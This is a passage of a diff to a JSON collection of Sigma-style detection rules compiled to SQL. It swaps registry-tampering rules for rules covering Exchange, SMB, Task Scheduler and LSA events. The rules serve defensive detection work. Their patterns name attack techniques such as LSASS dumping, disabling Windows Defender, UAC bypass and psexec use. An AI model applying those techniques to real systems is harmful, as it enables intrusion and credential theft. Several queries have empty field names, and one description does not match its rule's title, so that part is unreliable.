"author": "frack113", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" 
+ "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects execution of Sysinternals tools via an AppX package. 
Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", - "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "status": "test", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ 
- "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Account fallback reasons (after failed login with specific account)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. 
This could be a sign of potential exploitation attempts of CVE-2023-23397.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT 
(((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "author": "frack113", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Legitimate use" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs 
WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE 
'%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "status": "experimental", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.004" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). 
Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. 
(see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "status": "experimental", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "author": 
"frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", - "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 
